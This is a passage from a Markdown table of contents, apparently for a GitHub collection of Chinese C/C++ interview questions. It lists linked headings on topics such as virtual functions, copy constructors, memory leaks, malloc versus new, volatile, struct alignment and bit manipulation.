?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#349%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%80%E8%88%AC%E4%B8%8D%E5%AE%9A%E4%B9%89%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E8%80%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E4%B8%80%E8%88%AC%E5%86%99%E6%88%90%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E5%8E%9F%E5%9B%A0-) ##### [13.5.4 静态绑定和动态绑定的介绍](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#350%E9%9D%99%E6%80%81%E7%BB%91%E5%AE%9A%E5%92%8C%E5%8A%A8%E6%80%81%E7%BB%91%E5%AE%9A%E7%9A%84%E4%BB%8B%E7%BB%8D) ##### [13.5.5 引用是否能实现动态绑定,为什么引用可以实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#351%E5%BC%95%E7%94%A8%E6%98%AF%E5%90%A6%E8%83%BD%E5%AE%9E%E7%8E%B0%E5%8A%A8%E6%80%81%E7%BB%91%E5%AE%9A%E4%B8%BA%E4%BB%80%E4%B9%88%E5%BC%95%E7%94%A8%E5%8F%AF%E4%BB%A5%E5%AE%9E%E7%8E%B0) ##### [13.5.6 深拷贝和浅拷贝的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#352%E6%B7%B1%E6%8B%B7%E8%B4%9D%E5%92%8C%E6%B5%85%E6%8B%B7%E8%B4%9D%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.5.7 什么情况下会调用拷贝构造函数(三种情况)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#353%E4%BB%80%E4%B9%88%E6%83%85%E5%86%B5%E4%B8%8B%E4%BC%9A%E8%B0%83%E7%94%A8%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%B8%89%E7%A7%8D%E6%83%85%E5%86%B5) ##### [13.5.8 C++的四种强制转换](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#354c%E7%9A%84%E5%9B%9B%E7%A7%8D%E5%BC%BA%E5%88%B6%E8%BD%AC%E6%8D%A2) ##### [13.5.9 调试程序的方法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#355%E8%B0%83%E8%AF%95%E7%A8%8B%E5%BA%8F%E7%9A%84%E6%96%B9%E6%B3%95) ##### [13.6.1 extern“C”作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#356externc%E4%BD%9C%E7%94%A8) ##### [13.6.2 typdef和define区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#357typdef%E5%92%8Cdefine%E5%8C%BA%E5%88%AB) ##### [13.6.3 引用作为函数参数以及返回值的好处](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#358%E5%BC%95%E7%94%A8%E4%BD%9C%E4%B8%BA%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E4%BB%A5%E5%8F%8A%E8%BF%94%E5%9B%9E%E5%80%BC%E7%9A%84%E5%A5%BD%E5%A4%84) ##### [13.6.4 纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#359%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.6.5 什么是野指针](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#360%E4%BB%80%E4%B9%88%E6%98%AF%E9%87%8E%E6%8C%87%E9%92%88) ##### [13.6.6 线程安全和线程不安全](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#361%E7%BA%BF%E7%A8%8B%E5%AE%89%E5%85%A8%E5%92%8C%E7%BA%BF%E7%A8%8B%E4%B8%8D%E5%AE%89%E5%85%A8) ##### [13.6.7 C++中内存泄漏的几种情况](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#362c%E4%B8%AD%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E7%9A%84%E5%87%A0%E7%A7%8D%E6%83%85%E5%86%B5) ##### [13.6.8 栈溢出的原因以及解决方法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#363%E6%A0%88%E6%BA%A2%E5%87%BA%E7%9A%84%E5%8E%9F%E5%9B%A0%E4%BB%A5%E5%8F%8A%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95) ##### [13.6.9 C++标准库vector以及迭代器](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#364c%E6%A0%87%E5%87%86%E5%BA%93vector%E4%BB%A5%E5%8F%8A%E8%BF%AD%E4%BB%A3%E5%99%A8) ##### [13.7.1 C++中vector和list的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#365c%E4%B8%ADvector%E5%92%8Clist%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.7.2 C++中的基本数据类型及派生类型](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#366c%E4%B8%AD%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B%E5%8F%8A%E6%B4%BE%E7%94%9F%E7%B1%BB%E5%9E%8B) ##### [13.7.3 友元函数和友元类](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#367%E5%8F%8B%E5%85%83%E5%87%BD%E6%95%B0%E5%92%8C%E5%8F%8B%E5%85%83%E7%B1%BB) ##### [13.7.4 c++函数库中一些实用的函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#368c%E5%87%BD%E6%95%B0%E5%BA%93%E4%B8%AD%E4%B8%80%E4%BA%9B%E5%AE%9E%E7%94%A8%E7%9A%84%E5%87%BD%E6%95%B0) ##### [13.7.5 线程的基本概念、线程的基本状态及状态之间的关系?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#369%E7%BA%BF%E7%A8%8B%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5%E7%BA%BF%E7%A8%8B%E7%9A%84%E5%9F%BA%E6%9C%AC%E7%8A%B6%E6%80%81%E5%8F%8A%E7%8A%B6%E6%80%81%E4%B9%8B%E9%97%B4%E7%9A%84%E5%85%B3%E7%B3%BB) ##### [13.7.6 线程与进程的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#370%E7%BA%BF%E7%A8%8B%E4%B8%8E%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.7.7 C++多线程有几种实现方法,都是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#371c%E5%A4%9A%E7%BA%BF%E7%A8%8B%E6%9C%89%E5%87%A0%E7%A7%8D%E5%AE%9E%E7%8E%B0%E6%96%B9%E6%B3%95%E9%83%BD%E6%98%AF%E4%BB%80%E4%B9%88) ##### [13.7.8 C和C++的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#373c%E5%92%8Cc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.7.9 封装、继承、多态](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#374%E5%B0%81%E8%A3%85%E7%BB%A7%E6%89%BF%E5%A4%9A%E6%80%81) ##### [13.8.1 虚函数的作用及其实现原理](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#375%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8%E5%8F%8A%E5%85%B6%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86) ##### [13.8.2 深拷贝和浅拷贝(值拷贝和位拷贝)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#376%E6%B7%B1%E6%8B%B7%E8%B4%9D%E5%92%8C%E6%B5%85%E6%8B%B7%E8%B4%9D%E5%80%BC%E6%8B%B7%E8%B4%9D%E5%92%8C%E4%BD%8D%E6%8B%B7%E8%B4%9D) ##### [13.8.3 虚函数、纯虚函数怎么实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#377%E8%99%9A%E5%87%BD%E6%95%B0%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0) ##### [13.8.4 为什么要有纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#378%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E6%9C%89%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.8.5 纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#379%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.8.6 为什么要有虚析构函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#380%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E6%9C%89%E8%99%9A%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0) ##### [13.8.7 构造函数能不能是虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#381%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E8%83%BD%E4%B8%8D%E8%83%BD%E6%98%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.8.8 C++里面构造函数能有返回值吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#382c%E9%87%8C%E9%9D%A2%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E8%83%BD%E6%9C%89%E8%BF%94%E5%9B%9E%E5%80%BC%E5%90%97) ##### [13.8.9 构造函数和析构函数能被继承吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#383%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%92%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E8%83%BD%E8%A2%AB%E7%BB%A7%E6%89%BF%E5%90%97) ##### [13.9.1 C++中Overload、Overwrite及Override的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#384c%E4%B8%ADoverloadoverwrite%E5%8F%8Aoverride%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.9.2 一个空的class类里有什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#385%E4%B8%80%E4%B8%AA%E7%A9%BA%E7%9A%84class%E7%B1%BB%E9%87%8C%E6%9C%89%E4%BB%80%E4%B9%88) ##### [13.9.3 C++中一个空类的大小为什么是1?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#386c%E4%B8%AD%E4%B8%80%E4%B8%AA%E7%A9%BA%E7%B1%BB%E7%9A%84%E5%A4%A7%E5%B0%8F%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF1) ##### [13.9.4 一个结构体中有一个int,一个char,一个static int,问这个结构体占多少内存?(涉及到内存对齐机制)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#387%E4%B8%80%E4%B8%AA%E7%BB%93%E6%9E%84%E4%BD%93%E4%B8%AD%E6%9C%89%E4%B8%80%E4%B8%AAint%E4%B8%80%E4%B8%AAchar%E4%B8%80%E4%B8%AAstatic-int%E9%97%AE%E8%BF%99%E4%B8%AA%E7%BB%93%E6%9E%84%E4%BD%93%E5%8D%A0%E5%A4%9A%E5%B0%91%E5%86%85%E5%AD%98%E6%B6%89%E5%8F%8A%E5%88%B0%E5%86%85%E5%AD%98%E5%AF%B9%E9%BD%90%E6%9C%BA%E5%88%B6) ##### [13.9.5 结构体与联合体的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#388%E7%BB%93%E6%9E%84%E4%BD%93%E4%B8%8E%E8%81%94%E5%90%88%E4%BD%93%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.9.6 函数与宏的差别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#389%E5%87%BD%E6%95%B0%E4%B8%8E%E5%AE%8F%E7%9A%84%E5%B7%AE%E5%88%AB) ##### [13.9.7 宏函数和inline函数的异同点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#390%E5%AE%8F%E5%87%BD%E6%95%B0%E5%92%8Cinline%E5%87%BD%E6%95%B0%E7%9A%84%E5%BC%82%E5%90%8C%E7%82%B9) ##### [13.9.8 define 和 typedef 区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#391define-%E5%92%8C-typedef-%E5%8C%BA%E5%88%AB) ##### [13.9.9 标准C++中的include “” 与<>的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#392%E6%A0%87%E5%87%86c%E4%B8%AD%E7%9A%84include--%E4%B8%8E%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.1.1 C++的内存管理机制](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#393c%E7%9A%84%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%9C%BA%E5%88%B6) ##### [14.1.2 C语言中的malloc/free和C++中的new/delete的区别和联系](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#394c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84mallocfree%E5%92%8Cc%E4%B8%AD%E7%9A%84newdelete%E7%9A%84%E5%8C%BA%E5%88%AB%E5%92%8C%E8%81%94%E7%B3%BB) ##### [14.1.3 迭代和递归区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#395%E8%BF%AD%E4%BB%A3%E5%92%8C%E9%80%92%E5%BD%92%E5%8C%BA%E5%88%AB) ##### [14.1.4 不可操作的操作符](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#396%E4%B8%8D%E5%8F%AF%E6%93%8D%E4%BD%9C%E7%9A%84%E6%93%8D%E4%BD%9C%E7%AC%A6) ##### [14.1.5 C++关键字mutable作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#397c%E5%85%B3%E9%94%AE%E5%AD%97mutable%E4%BD%9C%E7%94%A8) ##### [14.1.6 引用与指针有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#398%E5%BC%95%E7%94%A8%E4%B8%8E%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.1.7 什么是黑盒测试和白盒测试?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#399%E4%BB%80%E4%B9%88%E6%98%AF%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95%E5%92%8C%E7%99%BD%E7%9B%92%E6%B5%8B%E8%AF%95) ##### [14.1.8 你知道的类模版有哪些](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#400%E4%BD%A0%E7%9F%A5%E9%81%93%E7%9A%84%E7%B1%BB%E6%A8%A1%E7%89%88%E6%9C%89%E5%93%AA%E4%BA%9B) ##### [14.1.9 new可以搭配free吗,为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#401new%E5%8F%AF%E4%BB%A5%E6%90%AD%E9%85%8Dfree%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [14.2.1 怎么查看内存泄漏](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#402%E6%80%8E%E4%B9%88%E6%9F%A5%E7%9C%8B%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F) ##### [14.2.2 什么是内存溢出](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#403%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E5%AD%98%E6%BA%A2%E5%87%BA) ##### [14.2.3 内存溢出的解决方案](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#404%E5%86%85%E5%AD%98%E6%BA%A2%E5%87%BA%E7%9A%84%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88) ##### [14.2.4 函数指针与指针函数分别是什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#405%E5%87%BD%E6%95%B0%E6%8C%87%E9%92%88%E4%B8%8E%E6%8C%87%E9%92%88%E5%87%BD%E6%95%B0%E5%88%86%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [14.2.5 C++11新特性了解吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#406c11%E6%96%B0%E7%89%B9%E6%80%A7%E4%BA%86%E8%A7%A3%E5%90%97) ##### [14.2.6 接口和抽象类的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#407%E6%8E%A5%E5%8F%A3%E5%92%8C%E6%8A%BD%E8%B1%A1%E7%B1%BB%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.2.7 预编译在做些什么事情?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#408%E9%A2%84%E7%BC%96%E8%AF%91%E5%9C%A8%E5%81%9A%E4%BA%9B%E4%BB%80%E4%B9%88%E4%BA%8B%E6%83%85) ##### [14.2.8 动态库和静态库?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#410%E5%8A%A8%E6%80%81%E5%BA%93%E5%92%8C%E9%9D%99%E6%80%81%E5%BA%93) ##### [14.2.9 堆和栈的区别,以及为什么栈效率高](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#411%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB%E4%BB%A5%E5%8F%8A%E4%B8%BA%E4%BB%80%E4%B9%88%E6%A0%88%E6%95%88%E7%8E%87%E9%AB%98) ##### [14.3.1 函数参数压栈方式为什么是从右到左的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#412%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E5%8E%8B%E6%A0%88%E6%96%B9%E5%BC%8F%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF%E4%BB%8E%E5%8F%B3%E5%88%B0%E5%B7%A6%E7%9A%84) ##### [14.3.2 C++中的智能指针](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#413c%E4%B8%AD%E7%9A%84%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88) ##### [14.3.3 基类里private成员函数可以声明为虚函数吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#414%E5%9F%BA%E7%B1%BB%E9%87%8Cprivate%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E5%A3%B0%E6%98%8E%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E5%90%97) ##### [14.3.4 函数A调用函数B的时候,有什么需要压栈?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#415%E5%87%BD%E6%95%B0a%E8%B0%83%E7%94%A8%E5%87%BD%E6%95%B0b%E7%9A%84%E6%97%B6%E5%80%99%E6%9C%89%E4%BB%80%E4%B9%88%E9%9C%80%E8%A6%81%E5%8E%8B%E6%A0%88) ##### [14.3.5 数组和指针区别?数组和链表呢?双向链表和单向链表?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#416%E6%95%B0%E7%BB%84%E5%92%8C%E6%8C%87%E9%92%88%E5%8C%BA%E5%88%AB%E6%95%B0%E7%BB%84%E5%92%8C%E9%93%BE%E8%A1%A8%E5%91%A2%E5%8F%8C%E5%90%91%E9%93%BE%E8%A1%A8%E5%92%8C%E5%8D%95%E5%90%91%E9%93%BE%E8%A1%A8) ##### [14.3.6 vector底层实现?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#417vector%E5%BA%95%E5%B1%82%E5%AE%9E%E7%8E%B0) ##### [14.3.7 vector与list的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#418vector%E4%B8%8Elist%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.3.8 变量的声明和定义有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#419%E5%8F%98%E9%87%8F%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.3.9 简述#ifdef、#else、#endif和#ifndef的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#420%E7%AE%80%E8%BF%B0ifdefelseendif%E5%92%8Cifndef%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [14.4.1 写出int、bool、float、指针变量与“零值”比较的if语句](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#421%E5%86%99%E5%87%BAintboolfloat%E6%8C%87%E9%92%88%E5%8F%98%E9%87%8F%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84if%E8%AF%AD%E5%8F%A5) ##### [14.4.2 结构体可以直接赋值吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#422%E7%BB%93%E6%9E%84%E4%BD%93%E5%8F%AF%E4%BB%A5%E7%9B%B4%E6%8E%A5%E8%B5%8B%E5%80%BC%E5%90%97) ##### [14.4.3 sizeof和strlen的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#423sizeof%E5%92%8Cstrlen%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.4.4 c语言的关键字static和c++关键字static有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#424c%E8%AF%AD%E8%A8%80%E7%9A%84%E5%85%B3%E9%94%AE%E5%AD%97static%E5%92%8Cc%E5%85%B3%E9%94%AE%E5%AD%97static%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.4.5 c语言的malloc和c++中的new有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#425c%E8%AF%AD%E8%A8%80%E7%9A%84malloc%E5%92%8Cc%E4%B8%AD%E7%9A%84new%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.4.6 写一个”标准“宏MIN](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#426%E5%86%99%E4%B8%80%E4%B8%AA%E6%A0%87%E5%87%86%E5%AE%8Fmin) ##### [14.4.7 ++i和i++的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#427i%E5%92%8Ci%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.4.8 volatile有什么作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#428volatile%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [14.4.9 一个参数可以既是const又是volatile吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#429%E4%B8%80%E4%B8%AA%E5%8F%82%E6%95%B0%E5%8F%AF%E4%BB%A5%E6%97%A2%E6%98%AFconst%E5%8F%88%E6%98%AFvolatile%E5%90%97) ##### [14.5.1 a和&a有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#430a%E5%92%8Ca%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.5.2 用c编写一个死循环程序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#431%E7%94%A8c%E7%BC%96%E5%86%99%E4%B8%80%E4%B8%AA%E6%AD%BB%E5%BE%AA%E7%8E%AF%E7%A8%8B%E5%BA%8F) ##### [14.5.3 结构体内存对齐的问题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#432%E7%BB%93%E6%9E%84%E4%BD%93%E5%86%85%E5%AD%98%E5%AF%B9%E9%BD%90%E7%9A%84%E9%97%AE%E9%A2%98) ##### [14.5.4 全局变量和局部变量有什么区别?是怎么是实现的?操作系统和编译器是怎么知道的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#433%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%E6%98%AF%E6%80%8E%E4%B9%88%E6%98%AF%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%92%8C%E7%BC%96%E8%AF%91%E5%99%A8%E6%98%AF%E6%80%8E%E4%B9%88%E7%9F%A5%E9%81%93%E7%9A%84) ##### [14.5.5 简述c、c++程序编译的内存分配情况](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#434%E7%AE%80%E8%BF%B0cc%E7%A8%8B%E5%BA%8F%E7%BC%96%E8%AF%91%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%83%85%E5%86%B5) ##### [14.5.6 简述strcpy、sprintf、memcpy的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#435%E7%AE%80%E8%BF%B0strcpysprintfmemcpy%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.5.7 解析((void()())0)()的含义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#436%E8%A7%A3%E6%9E%90void0%E7%9A%84%E5%90%AB%E4%B9%89) ##### [14.5.8 c语言的指针和引用和c++的有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#437c%E8%AF%AD%E8%A8%80%E7%9A%84%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E5%92%8Cc%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.5.9 new与malloc的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#438new%E4%B8%8Emalloc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.6.1 malloc/free 为什么还要 new/delete?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#439mallocfree-%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%98%E8%A6%81-newdelete) ##### [14.6.2 delete与 delete []区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#440delete%E4%B8%8E-delete-%E5%8C%BA%E5%88%AB) ##### [14.6.3 在物理内存为1G的计算机中能否malloc(1.2G)?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#441%E5%9C%A8%E7%89%A9%E7%90%86%E5%86%85%E5%AD%98%E4%B8%BA1g%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%AD%E8%83%BD%E5%90%A6malloc12g) ##### [14.6.4 用C写个程序,如何判断一个操作系统是16位还是32位的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#442%E7%94%A8c%E5%86%99%E4%B8%AA%E7%A8%8B%E5%BA%8F%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E4%B8%80%E4%B8%AA%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E6%98%AF16%E4%BD%8D%E8%BF%98%E6%98%AF32%E4%BD%8D%E7%9A%84) ##### [14.6.5 解释下位域,为什么要用位域,位域的好处?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#443%E8%A7%A3%E9%87%8A%E4%B8%8B%E4%BD%8D%E5%9F%9F%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E7%94%A8%E4%BD%8D%E5%9F%9F%E4%BD%8D%E5%9F%9F%E7%9A%84%E5%A5%BD%E5%A4%84) ##### [14.6.6 位操作](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#444%E4%BD%8D%E6%93%8D%E4%BD%9C) ##### [14.6.7 在某工程中,要求设置一绝对地址为0x67a9的整型变量的值为0xaa66。编译器是一个纯粹的ANSI编译器。写代码去完成这一任务。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#445%E5%9C%A8%E6%9F%90%E5%B7%A5%E7%A8%8B%E4%B8%AD%E8%A6%81%E6%B1%82%E8%AE%BE%E7%BD%AE%E4%B8%80%E7%BB%9D%E5%AF%B9%E5%9C%B0%E5%9D%80%E4%B8%BA0x67a9%E7%9A%84%E6%95%B4%E5%9E%8B%E5%8F%98%E9%87%8F%E7%9A%84%E5%80%BC%E4%B8%BA0xaa66%E7%BC%96%E8%AF%91%E5%99%A8%E6%98%AF%E4%B8%80%E4%B8%AA%E7%BA%AF%E7%B2%B9%E7%9A%84ansi%E7%BC%96%E8%AF%91%E5%99%A8%E5%86%99%E4%BB%A3%E7%A0%81%E5%8E%BB%E5%AE%8C%E6%88%90%E8%BF%99%E4%B8%80%E4%BB%BB%E5%8A%A1) ##### [14.6.8 给定一个整型变量a,写两段代码,第一个设置a的bit3,第二个清除a的bit,在以上两个操作中,要保持其它位不变。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#446%E7%BB%99%E5%AE%9A%E4%B8%80%E4%B8%AA%E6%95%B4%E5%9E%8B%E5%8F%98%E9%87%8Fa%E5%86%99%E4%B8%A4%E6%AE%B5%E4%BB%A3%E7%A0%81%E7%AC%AC%E4%B8%80%E4%B8%AA%E8%AE%BE%E7%BD%AEa%E7%9A%84bit3%E7%AC%AC%E4%BA%8C%E4%B8%AA%E6%B8%85%E9%99%A4a%E7%9A%84bit%E5%9C%A8%E4%BB%A5%E4%B8%8A%E4%B8%A4%E4%B8%AA%E6%93%8D%E4%BD%9C%E4%B8%AD%E8%A6%81%E4%BF%9D%E6%8C%81%E5%85%B6%E5%AE%83%E4%BD%8D%E4%B8%8D%E5%8F%98) ##### [14.6.9 